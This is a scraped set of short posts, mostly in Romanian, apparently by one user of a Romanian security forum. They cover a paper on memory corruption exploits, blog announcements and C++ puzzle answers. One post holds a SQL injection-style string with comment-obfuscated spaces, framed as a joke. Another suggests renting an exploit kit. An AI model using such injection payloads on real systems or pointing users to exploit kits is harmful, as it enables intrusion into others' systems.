  11. [h=3]History of memory corruption vulnerabilities and exploits[/h] I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of flaws in common software is still much too high. Consider what’s required to compromise today’s most hardened consumer platforms, iOS and Chrome. You need a flaw in the default install that is useful and remotely accessible, memory disclosure bug, sandbox bypass (or multiple ones), and often a kernel or other privilege escalation flaw. Given a sufficiently small trusted computing base, it should be impossible to find this confluence of flaws. We clearly have too large a TCB today since this combination of flaws has been found not once, but multiple times in these hardened products. Other products that haven’t been hardened require even less flaws to compromise, making them more vulnerable even if they have the same rate of bug occurrence. The paper’s conclusion shows that if you want to prevent exploitation, your priority should be preventing stack, heap, and integer overflows (in that order). Stack overflows are by far still the most commonly exploited class of memory corruption flaws, out of proportion to their prevalence. We’re clearly not smart enough as a species to stop creating software bugs. It takes a Dan Bernstein to reason accurately about software in bite-sized chunks such as in qmail. It’s important to face this fact and make fundamental changes to process and architecture that will make the next 18 years better than the last. Download: http://www.isg.rhul.ac.uk/sullivan/pubs/raid-2012.pdf Sursa: History of memory corruption vulnerabilities and exploits | root labs rdist
  12. Am gasit un "bridge" intre Wordpress si vBulletin, insa nu merge pe aceasta versiune. Mai exact, crapa tot blog-ul. Voi incerca sa fac eu ceva "manual" pentru comentarii, insa nu stiu cand. Deocamdata lasam asa, sa vedem ce iese.
  13. Nytro

    intrebare

    ' or username=NUMELE_TAU_REAL/**/and/**/aDDreSS=ADRESA_TA_DE_ACASA Inlocuiesti ce e cu majuscule cu datele tale reale.
  14. 1. 6 (1 + 2 + 3) 2. RSTRSTRSTRST (cand b ajunge 0) 3. Hello world (format de compatibilitate cu tastaturile "vechi" adica antice) 4. Nu ai "using namespace std;". Invalid lvalue... ? 5. RST 6. Acum este ora 4 noaptea! Sa fac un challenge pe RST 7. 9 (2 + 3 + 4) 8. exit(0), RST (nu se mai compileaza deci nu mai afiseaza nimic) Plm
  15. Da, de acea pagina am avea nevoie, de un design pentru ea.
  16. Legat de istorie, sunt foarte putini persoane pe care o cunosc, care activeaza de cel putin 5-6 ani. Daca tot veni vorba, se ofera cineva sa faca un homepage? Doar de design avem nevoie, de integrare ma voi ocupa eu.
  17. Da, m-am gandit la asta. Cand voi avea timp liber voi scrie un articol mai detaliat, sper doar sa am timp...
  18. Salut, Pentru a completa forumul am decis sa deschidem un blog: https://rstforums.com/blog/ Blog-ul are doar rol informativ, va contine anunturi administrative, mici articole in limba romana si multe altele. Mai multe informatii: https://rstforums.com/blog/2013/03/23/blog-ul-rst/ Pe blog vor posta doar membrii din staff. Daca aveti ceva frumos care considerati ca se poate posta, luati legatura cu cineva din staff. Daca sunt probleme sau daca aveti sugestii le asteptam cu placere aici. // RST
  19. Nytro

    Salut

    La revedere.
  20. Nu te risca, sunt multi tepari. Nu am incercat si nici nu voi incerca, dar aia sunt ratatii care copiau exploit-urile altora si spuneau ca sunt ale lor: injector. Daca vrei exploit-uri e simplu: inchiriaza un exploit kit! Si da-mi si mie de veste daca faci asta
  21. Cand suni in alta retea se aude un "bipuit" care te anunta ca "poti fi taxat suplimentar".
  22. www.youtube.com/watch?v=Z1eX1vEgiRQ
  23. Info: Sun? la 544 ?i afl? dac? ai telefonul ascultat: Ofi?erii de la Informa?ii pot fi surprin?i în „flagrant”? Cine le autorizeaz? intercept?rile
  24. Da, parca un joc, parca de la Steam era. Adica nu stiu daca avea treaba cu OpenGL, parca nu OpenGL optimizasera ci acel joc...
×
×
  • Create New...